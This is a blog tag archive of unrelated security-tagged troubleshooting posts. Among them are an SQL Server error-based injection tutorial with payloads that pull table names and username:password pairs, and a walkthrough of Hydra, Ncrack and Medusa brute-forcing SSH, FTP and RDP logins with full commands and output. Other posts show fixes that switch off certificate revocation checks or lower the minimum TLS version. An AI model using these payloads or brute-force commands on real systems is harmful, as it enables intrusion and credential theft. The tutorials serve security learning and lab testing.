Tag Archives: security

Spring security failed to log in, error: there is no passwordencoder mapped for the ID “null”

After writing the websecurityconfig class that inherits the websecurityconfigureradapter class, we need to define authentication in the configure (authentication manager builder auth) method, which is used to obtain information sources and password verification rules. (the name of the configure function doesn’t matter. The official name seems to be configureglobal (…) )It is important to configure the authenticationmanagerbuilder in the class annotated by @ enablewebsecurity or @ enableglobalmethodsecurity or @ enableglobalauthentication).

The source of authentication information I used at the beginning was in memory authentication. The code is as follows

 
    protected void configure (authentication manager auth) throws exception { // inmemoryauthentication gets from memory auth.inMemoryAuthentication ().withUser("user1").password("123456").roles("USER"); }

The login page of spring security is used. As a result, when logging in, the user name and password are correct, and the resource cannot be opened, so it still stays on the login page. There is no passwordencoder mapped for the ID "null".

Baidu found that this is because spring security 5.0 added a variety of encryption methods, but also changed the password format.

Let's take a look at the official documents. Here are the original words of the official documents:

 

-------------------------------------------------------------------------------------------------------------------

The general format for a password is:

{id}encodedPassword

Such that id is an identifier used to look up which PasswordEncoder should be used and encodedPassword is the original encoded password for the selected PasswordEncoder. The id must be at the beginning of the password, start with { and end with }. If the id cannot be found, the id will be null. For example, the following might be a list of passwords encoded using different id. All of the original passwords are "password".

{bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM/BG 
{noop}password 
{pbkdf2}5d923b44a6d129f3ddf3e3c8d29412723dcbde72445e8ef6bf3b508fbf17fa4ed4d6b99ca763d8dc 
{scrypt}$e0801$8bWJaSu2IKSn9Z9kM+TPXfOc/9bdYSrN1oD9qfVThWEwdRTnO7re7Ei+fUZRJ68k9lTyuTeUp4of4g24hHnazw==$OAOec05+bXxvuu/1qZ6NUR+xQYvYv7BeL1QxwRpY5Pc=  
{sha256}97cde38028ad898ebc02e690819fa220e88c62e0699403e94fff291cfffaf8410849f27605abcbc0

-------------------------------------------------------------------------------------------------------------------

 

The storage format of passwords in spring security is "{ID}.....". The front ID is the encryption method, the ID can be bcrypt, sha256, etc., followed by the encrypted password. In other words, when the program gets the passed password, it will first find the ID included by "{" and "}" to determine how the subsequent password is encrypted. If it cannot be found, it will be considered that the ID is null. This is why our program will report an error: there is no passwordencoder mapped for the ID "null". In the example of official documents, various encryption methods are used to encrypt the same password. The original password is "password".

 

If we want our project to log in normally, we need to modify the code in configure. We need to encrypt the password from the front end in some way. Spring security officially recommends using bcrypt encryption. So how to encrypt the password?Just specify it in the configure method.

After modification, it looks like this:

 
    protected void configure (authentication manager auth) throws exception { // inmemoryauthentication gets from memory auth.inMemoryAuthentication ().passwordEncoder(new BCryptPasswordEncoder()).withUser("user1").password(new BCryptPasswordEncoder().encode("123456")).roles("USER"); }

After inmemoryauthentication(), there is ". Passwordencoder (New bcryptpasswordencoder())", which is equivalent to using bcrypt encryption to process the user password when logging in. The previous ". Password (" 123456 ")" is changed to ". Password (New bcryptpasswordencoder(). Encode (" 123456 ")", which is equivalent to bcrypt encoding and encryption of the password in memory. The comparison is consistent, which indicates that the password is correct and login is allowed.

If you are also using the password from the memory, then according to the above modification should be successful login, no problem.

If you use to store the user name and password in the database, you usually use bcrypt code to encrypt the user password and store it in the database. And modify the configure() method, add ". Passwordencoder (New bcryptpasswordencoder())" to ensure that users use bcrypt to process the password when they log in, and then compare it with the password in the database. As follows:

 
    // inject the implementation class of userdetailsservice auth.userDetailsService (userService).passwordEncoder(new BCryptPasswordEncoder());
     

reprint https://blog.csdn.net/canon_ in_ d_ major/article/details/79675033

Solution of server not running yetexception in HBase

I encountered a server not running yetexception error while working today. The symptom is that it is normal to enter HBase shell, but this error will be thrown when executing any instruction.

There is no error message when checking the log. At first I thought there was HBase process not up, but the JPS command showed that all started.

It’s a little tricky.. Because the test server was restarted a few days ago, and then I did some other work on it. So it is suspected that the problem is port occupancy.. However.. Neither..

I had no choice, so I moved out the ultimate solution: reloading Hadoop and HBase. After the official configuration is completed. HBase is miraculously good..

I once suspected that it was my configuration.. However.. Neither..

Finally found a solution on the Internet, because Hadoop is in a safe mode. So HBase operation will be abnormal. I’m not sure how it works. The solution is to manually exit safe mode

./hadoop dfsadmin -safemode leave

Then restart HBase and solve the problem

Uncaught error: call to undefined function MySQL when building sqli lab environment with phpstudy_ Connect() error

The problem

Uncaught Error: Call to undefined function mysql_connect()

why
In PHP 5+, you can use both mysql_connect() and mysqli_conncet() instead of mysqli_conncet().
The solution
In the PHPStudy environment, you can downgrade the PHP version by selecting the PHP5 + version.
>
>

Web site – & gt; Management – & gt; PHP version. (You can choose to replace an older version of PHPStudy.)
If you want to use php7 without changing the code, you can use the admin ->; For PHP extensions, check the box before php_mysql.

12-web security — error injection based on SQL Server — and, convert, cast

We know that SQL Server is developed by Microsoft, a very good database, can accurately locate the error message, this is very developer friendly, especially for Web security workers, using SQL Server error information to effectively penetrate the target system test.
 
Id =1′ and 1=(@@version)–+;

When executing SQL statement, the database will treat the contents in parentheses of 1=(@@Version) statement as the number of int type. However, @@Version itself is a string of type NVARCHAR. SQL Server will fail to convert NCARCHAR into INIT type and report an error.
 
SQL Server error injection principle is the use of data type conversion error. The character type is converted into a number of characters, but the form of expression is still characters, resulting in the database can not identify the error, at the same time in the process of error will also show the SQL statement query information, such as the database version of the query information combined with the error information back to the page.
 
For example, you can construct a SQL statement by inputing an error query into all table names in the current database:

id=1' and 1=(select top 1 table_name from information_schema.tables)--+


Note that since the = sign precedes the parentheses and the SELECT statement produces more than one result, you need to combine the top statement to limit the result of the query to one, display the result to the Web page by error, and then use the top n statement to query the following table names.
 
 
You can also use the FOR XML PATH and the QUOTENAME statement to display the result as a single line to construct the SQL statement:

select quotename(table_name) from information_schema.tables for xml path('')

 
 
Select * from user where user = ‘user’;

select quotename(column_name) from information_schema.columns where table_name='users' for xml path('')

 
Select * from user where user name = ‘user’ and password = ‘user’;

select username,':',password,'|' from users for xml path('')

 
Usually, the page may not be able to display all the user names and passwords due to the number of characters displayed. Substring function can be used to display the query results in sections, starting from the first character and displaying 250 characters:

select substring((select username,':',password,'|' from users for xml path('')),1,250)

SQL Server databases use the Substring function in the same way as MySQL does.
 
 
Select * from users where user = ‘users’;

 
 

Error injection based on convert and cast functions.

The convert function takes the time to define a datatype (format) in the form of:

convert(data_type(length),data_to_be_converted,style)

Parameters to the convert function:
DATA_TYPE (LENGTH) : Indicates the defined data type, and LENGTH represents the optional length
Data_to_be_converted: time, that is, the value of the need to transform
Style: Represents the output format of the specified time/date
 
 
Convert function:

 
VARCHAR (20) represents the data type defined as VARCHAR with a length of 20, getdate is used to get the current time, 111 represents the time output in year/month/day (i.e. 2020/07/11) format.
 
An error occurs if the convert function converts the database name to an int (such as the SQL statement select convert (int, db_name(), 111)), and the name of the database is also exposed.
 
 
Error injection based on the convert function:

id=1' and 1=convert(int,db_name(),111) --+


For the above SQL statements, the convert function will be the second parameter db_name after () attempts to convert the result of the type int, but because the db_name () returns is nvarchar type, the result of the SQL server cannot converting nvarchar type specified int type, so the convert function will be an error prompt, at the same time will be the second parameter specifies the results of the query of SQL statement together with the error message came out
 
The cast function converts one data type to another. The cast function is a function that converts one data type to another.

cast(expression as data_type)

CAST Parameter Description:
Expression: Any valid SQL Server expression
As: is used to split two parameters. The parameter before as (expression) is the data to be processed, and the parameter after as (data_type) is the data type to be converted
DATA_TYPE: Data types supplied by the target system, including BIGINT and SQL_VARLANT, cannot use user-defined data types
 
The cast function is used as follows:

 
SQL> convert 123456 to int;
 
 
The cast function converts the database name to an int, and the cast function reveals the database name security.

 
 
 
Error injection based on CAST function:

id=1' and 1=cast(host_name() as int) --+


 
 
SQL> select table names from sysobjects; select table names from sysobjects; select table names from sysobjects;

select quotename(name) from sysobjects where xtype='u' for xml path('')


 
 
SQL> select column name from column name;

select quotename(name) from syscolumns where id=(select id from sysobjects where name='users' and xtype='u') for xml path('')


 
 
 
SQL> select * from users where user = ‘user’;

select substring((select username,':',password,'|' from users for xml path('')),1,250)


 
In addition to displaying the username and password piecemeal using the Substring function, you can also display the username and password sequentially using the exclusion method.
 

Brute Forcing Passwords with ncrack, hydra and medusa

https://hackertarget.com/brute-forcing-passwords-with-ncrack-hydra-and-medusa/

Lets test some password breaking tools. Password’s are often the weakest link in any system. Testing for weak passwords is an important part of security assessments.
I am going to focus on tools that allow remote service brute forcing. These are typically Internet facing services that are accessible from anywhere in the world. Another type of password brute forcing is attacks against the password hash, using tools such as Hashcata powerful tool that is able to crack encrypted password hashes on a local system.
The three tools I will assess are Hydra, Medusa and Ncrack (from nmap.org).
Installation of all three tools was straight forward on Ubuntu Linux.

wget https://nmap.org/ncrack/dist/ncrack-0.5.tar.gz
./configure
make
make install

wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
./configure
make
make install

wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz
./configure
make
make install

Then I grabbed a list of 500 passwords from skullsecurity.org. Of course you can find password lists with many thousands or even millions of passwords. You will need to chose what is the most appropriate for your password testing as factors such as target type and rate of testing will be major factors.

wget http://downloads.skullsecurity.org/passwords/500-worst-passwords.txt

This testing was performed against a Linux Virtual Machine running on Virtualbox.
The first series of tests was against SSH. I set the root account with the password toor. I added toor to the end of the 500 password list at number 499.

~# hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
Hydra v6.3 (c) 2011 by van Hauser/THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-05 16:45:19
[DATA] 16 tasks, 1 servers, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 185.00 tries/min, 185 tries in 00:01h, 315 todo in 00:02h
[STATUS] 183.00 tries/min, 366 tries in 00:02h, 134 todo in 00:01h
[22][ssh] host: 10.10.10.10   login: root   password: toor
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-05 16:48:08

Successfully found the password with Hydra!

~# ncrack -p 22 --user root -P 500-worst-passwords.txt 10.10.10.10

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-05 16:50 EST
Stats: 0:00:18 elapsed; 0 services completed (1 total)
Rate: 0.09; Found: 0; About 6.80% done; ETC: 16:54 (0:04:07 remaining)
Stats: 0:01:46 elapsed; 0 services completed (1 total)
Rate: 3.77; Found: 0; About 78.40% done; ETC: 16:52 (0:00:29 remaining)

Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: 'root' 'toor'

Ncrack done: 1 service scanned in 138.03 seconds.

Ncrack finished.

Successfully found the password with Ncrack!

# medusa -u root -P 500-worst-passwords.txt -h 10.10.10.10 -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun/Foofus Networks 

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (2 of 500 complete)

<< --- SNIP --->>>

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: billy (498 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: toor (499 of 500 complete)
ACCOUNT FOUND: [ssh] Host: 10.10.10.10 User: root Password: toor [SUCCESS]

~ 1500 seconds
Success again with Medusa, however it took over 10 times as long with the default settings of each tool.
Lets try and speed things up a bit. cranking up Medusa speed to use 5 concurrent logins fails with the following error:

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: mustang (7 of 500 complete)
medusa: ath.c:193: _gcry_ath_mutex_lock: Assertion `*lock == ((ath_mutex_t) 0)' failed.
Aborted

Trying Ncrack at a faster rate was a bit faster but not much.

ncrack -p ssh -u root -P 500-worst-passwords.txt -T5 10.10.10.10

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 09:04 EST

Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: 'root' 'toor'

Ncrack done: 1 service scanned in 128.98 seconds.

Ncrack finished.

Is Hydra any faster?Here I added the option for 32 threads.

$ hydra -t 32 -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
Hydra v6.3 (c) 2011 by van Hauser/THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-06 12:44:03
[DATA] 32 tasks, 1 servers, 500 login tries (l:1/p:500), ~15 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 184.00 tries/min, 184 tries in 00:01h, 316 todo in 00:02h
[STATUS] 185.50 tries/min, 371 tries in 00:02h, 129 todo in 00:01h
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
[22][ssh] host: 10.10.10.10   login: root   password: toor
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-06 12:46:57

No change really. Perhaps the limiting factor for Hydra and Ncrack is the speed of response from the VirtualBox machine. Either way it appears the default speed is pretty good for both tools.
Now to try hitting the FTP server on the same host (vsftpd).

ncrack -u test -P 500-worst-passwords.txt 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 12:53 EST
Stats: 0:00:40 elapsed; 0 services completed (1 total)
Rate: 5.94; Found: 0; About 47.20% done; ETC: 12:54 (0:00:45 remaining)
Stats: 0:00:59 elapsed; 0 services completed (1 total)
Rate: 6.93; Found: 0; About 88.00% done; ETC: 12:54 (0:00:08 remaining)

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 69.01 seconds.

Attempting to push it faster….

$ ncrack -u test -P 500-worst-passwords.txt -T 5 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 12:55 EST
Stats: 0:00:03 elapsed; 0 services completed (1 total)
Rate: 0.00; Found: 0; About 0.00% done
Stats: 0:00:06 elapsed; 0 services completed (1 total)
Rate: 0.00; Found: 0; About 0.00% done

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 66.01 seconds.

Same result. Limiting factor is likely the VM.

$ hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ftp
Hydra v6.3 (c) 2011 by van Hauser/THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-06 13:07:43
[DATA] 16 tasks, 1 servers, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service ftp on port 21

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd
Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

[STATUS] 219.00 tries/min, 219 tries in 00:01h, 281 todo in 00:02h
Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd
[STATUS] 233.06 tries/min, 470 tries in 00:02h, 30 todo in 00:01h
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-06 13:09:56

Oops, did we crash the FTP service?
Now testing with Medusa.

~$ medusa -u test -P 500-worst-passwords.txt -h 10.10.10.10 -M ftp
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun/Foofus Networks 

ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: password (2 of 500 complete)
ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: 12345678 (3 of 500 complete)
ERROR: [ftp.mod] failed: medusaReceive returned no data. Server may have dropped connection due to lack of encryption. Enabling the EXPLICIT mode may help.
CRITICAL: Unknown ftp.mod module state -1

Medusa also appears to be struggling.
Lets go back and check again with ncrack to ensure the service is still ok.

~$ ncrack -u test -P 500-worst-passwords.txt -T 5 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 13:14 EST

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 62.99 seconds.

Ncrack finished.

ncrack for the win!
ncrack has the ability to also brute force RDP accounts. So lets now hit a Windows box with Microsoft Remote Desktop Protocol enabled.

$ ncrack -u administrator -P 500-worst-passwords.txt -p 3389 10.212.50.21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 13:26 EST
Stats: 0:02:18 elapsed; 0 services completed (1 total)
Rate: 0.02; Found: 0; About 3.40% done; ETC: 14:33 (1:05:21 remaining)
Stats: 0:15:07 elapsed; 0 services completed (1 total)
Rate: 0.20; Found: 0; About 13.80% done; ETC: 15:15 (1:34:25 remaining)
Stats: 0:22:19 elapsed; 0 services completed (1 total)
Rate: 0.02; Found: 0; About 19.40% done; ETC: 15:21 (1:32:43 remaining)
Stats: 0:24:46 elapsed; 0 services completed (1 total)

Discovered credentials for rdp on 10.212.50.21 3389/tcp:
10.212.50.21 3389/tcp rdp: 'administrator' 'toor'

Ncrack done: 1 service scanned in 6072 seconds.

Protocols supported include:

Hydra - TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc, RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, Subversion/SVN, Firebird, LDAP2, Cisco AAA

Medusa -  AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper,
Web Form

Ncrack - RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, telnet

There is much more that could be tested for a more comprehensive review. Other protocols, different targets, latency and Further tweaking of the scan speeds and threads.
While ncrack has limited protocol support compared to Hydra and Medusa the only conclusion for this little test; when it comes to speed, reliability and the ability to hit RDP services ncrack wins!!

Http Error 12057 (Bug Fix Note)

A Bug has been reported in the product that only occurs for a specific platform, Windows Server 2003 Standard Edition.
Check the Trace Log and find that the wrapper class of Wininet call returns Error 12057, with the specific Error contents as follows:

ERROR_WINHTTP_SECURE_CERT_REV_FAILED

12057

Indicates that revocation cannot be checked because the revocation server was offline (equivalent to CRYPT_E_REVOCATION_OFFLINE).
Open the
IE-> Tools-> Internet Options-> Advanced Tab-> Security Options – & gt;” Check for server certificate revocation(Requires Restart) “

This option is currently selected. Remove this option and the Bug symptoms disappear. Only IE with Windows Server 2003 Standard Edition is checked by default, and Error 12057 (Microsoft’s Bug?) does not occur when this option is checked on other platforms. or with other options?) . Decided to code the problem.
The code to solve this problem is quite simple. Add the following code after HttpOpenRequest to set the current Http connection options to cancel this check
DWORD dwFlags = 0;

DWORD dwError = 0;

DWORD dwBuffLen = sizeof(dwFlags);
InternetQueryOption(m_hRequest, INTERNET_OPTION_SECURITY_FLAGS,

(LPVOID)& dwFlags, & dwBuffLen);

dwFlags |= SECURITY_FLAG_IGNORE_REVOCATION;

InternetSetOption(m_hRequest, INTERNET_OPTION_SECURITY_FLAGS, (LPVOID)& dwFlags, sizeof(dwFlags)) ;

Infragistics.NetAdvantage . 2006.vol2 error 1609 solution

Description:
error 1609,an error occurred while applying security settings.
aspnet is not a valid user or group.this could be a problem with the package,or a problem connecting to a domain controller on the network.check your network connection and click retry,or cancel to end the install.
Error 1609
error applying security Settings. The user is not a valid user or group. This could be due to a problem with the package or a problem connecting to a domain controller on the network.
Simply put, the ASPNET user does not exist or the domain in which the user resides has a problem. If the user doesn’t exist, create a user named ASPNET, or if it does, it could be a domain problem.
I encountered a situation where the user already existed. Solution: In “My Computer” right-click “Administration”, disable, enable, and add ASPNET users to the list owned by Administrator. The installation passes.  

Passwd: authentication token manipulation error in Linux

If in Linux, whether root or ordinary user logs in and changes their password, passwd: Authenticationtoken Manipulation error occurs — the solution to the error:
Root herself failed to change the password

Normal user failed to change password

1. Reporting such an error is: password: authentication token operation error, usually due to the permissions of the password file, but may also be the root directory space is full.

Using the Lsattr command to view the file properties that hold the user and password, you find the I option: (I: Do not arbitrarily change files or directories.) As a result, all users cannot change their passwords because they have no permission to do so.
2. We need to use the chattr command to revoke the I permission, and then modify, it is ok.

3. Then test root and Xiaogang users to change their passwords.
Test the root user to change the password

Test xiaogang users to change their passwords

4. For security reasons, it is better to change the password and protect the file where the user and password are stored.
Also chattr + I /etc/passwd and chattr + I /etc/shadow files
5 ordinary users to modify their passwords, is required, the password must be complex, and in the password dictionary some characters can be set.

soap security negotiation failed

1. Software background: The server runs the service, and the client program cannot access the service. The service can be called normally using WCFTestClient.

2. Exception message: SOAP security negotiation with ‘HTTP… ‘ for target ‘http… ‘ failed.
3. Solutions:
A. Find the following information in the client configuration file:

        <identity>
          <userPrincipalName value="XXX" />
        </identity>

B. Delete this section.
4. Q&a: this configuration item USES NTLM for authentication. No changes are made when debugging locally. When the server is deployed, you need to consider.
 

IOS development NSURLSession/NSURLConnection HTTP load failed solution

Recently, I have been busy for the launch of the new storage app. I have been busy for nearly a month. After a period of 996, I can finally take a breath today and continue to update my blog. This paper records the problems and solutions encountered when sending a HTTPS request in iOS 9. It is hoped that through this paper, we can have a deeper understanding of the configuration of ATS.
Problem description
When developing app, I encountered the problem of sending HTTPS request in iOS 9 :

NSURLSession/NSURLConnection HTTP load failed (kCFStreamErrorDomainSSL, -9801)

As we know, after , iOS 9, all network requests use HTTPS by default. If you send HTTP request, the following error will be reported. But we can allow HTTP request by setting the value of nsapptransportsecuritynsallowsarbitraryloads to be YES :

App Transport Security has blocked a cleartext HTTP (http://) resource load since it is insecure. Temporary exceptions can be configured via your app's Info.plist file.

info.plist

This solves the HTTP request problem, but when I send a HTTPS request, the HTTP laod failed problem still occurs. Although the above method can also be used to solve this problem, it is not the fundamental solution.
The solution
Through the analysis, doubt is TLS problem, because the 9 default need TLS1.2 iOS version to encrypt data, if the server does not support the TLS1.2 , the URLSession: task: didCompleteWithError: returns the nil error , However, the back-end development colleagues said that the server supports TLS1.0, TLS1.1 and TLS1.2, it seems that this is not the problem of TLS. Therefore, I was not assured. I used nscurl to test the test server. As expected, TLS1.2 was not supported.

# 加 --verbose 是为了显示详细的调试信息
/usr/bin/nscurl --ats-diagnostics --verbose https://testresource.chaoaicai.com

It can be seen from the output that the server only supports TLS1.0. Therefore, the colleagues in the background development were asked to test and modify, and then tested again. It was found that the server supports TLS1.2, and the network request of HTTPS is normal.

ATS exception configuration
In fact, for the server does not support TLS1.2, but the client to send HTTPS request there is another solution, is to configure ATS, set the lowest TLS version, as shown in infos.plist :

<key>NSAppTransportSecurity</key>
  <dict>
  <key>NSExceptionDomains</key>
  <dict>
    <!--你的https域名-->
    <key>testresource.chaoaicai.com</key>
    <dict>
      <!--允许子域-->
      <key>NSIncludesSubdomains</key>
      <true/>
      <!--TLS允许的最低版本号-->
      <key>NSExceptionMinimumTLSVersion</key>
      <string>TLSv1.0</string>
    </dict>
  </dict>
</dict>

Where, the specific Settings of NSExceptionDomains are described below, where ATS can be understood in more detail
NSIncludesSubdomains: is applied to the domain name, the default is NONSExceptionAllowsInsecureHTTPLoads: whether to allow HTTP requests, YES (allow), the default is NONSExceptionMinimumTLSVersion: TLS version of the lowest NSExceptionRequiresForwardSecrecy: whether to pre encryption, NO (encryption is allowed, but does not support PFS: Perfect forward secrecy), default is YESNSRequiresCertificateTransparency: the need for effective signing certificate, YES (need), the default is NO

This paper just briefly introduces how to configure ATS, and solves the problem that HTTPS cannot be accessed because the server does not support TLS1.2. It is necessary to understand the specific workflow of HTTPS and TLS, please refer to relevant materials.
The resources
# # iOS issue record about NSURLSession/NSURLConnection HTTP load failed (kCFStreamErrorDomainSSL, - 9801)
IOS 9 comes with a series of tutorials
IOS 9.0
Clean up the pits in iOS9 adaptation (graphic)
Cocoa Keys
NSURLSession/NSURLConnection HTTP load failed (kCFStreamErrorDomainSSL, -9802) on a subdomain?

Runtime Error 1004 Method ‘VBProject’ of object ‘_Workbook’ failed

症状

在Enterprise Performance Foundation Administrator中,当尝试使用位于“Configuration Rules”的“Create from Spreadsheet”按钮导入维度成员时;“维度”比;”成员”,以下错误发生时,您打开WebADI.xls

运行时错误’1004′:

方法’VBProject’的对象’_Workbook’失败

你在打开电子表格时选择了“启用宏”按钮。另外,在Excel 2003中,如果你打开“工具”>“宏”比;”安全…”,安全级别为”中等”.

解决方案

在Excel 2003中,转到“Tools”>“宏”比;“安全”,并选择“可信来源”选项卡。选中“信任访问Visual Basic项目”旁边的复选框。

(注意:还应选中“信任所有已安装的外接程序和模板”框。
在Excel 2007中,使用以下导航:

办公室李

    <>点击按钮在左上角李 <李>单击Excel选项按钮李 <>李在左边,点击信任中心李 <李>单击信任中心设置按钮李 <>李在左边,点击宏设置李 <李>单击“信任访问VBA项目对象模型”李

    转自:https://support.oracle.com/CSP/main/article?cmd=show&类型= NOT& id = 376013.1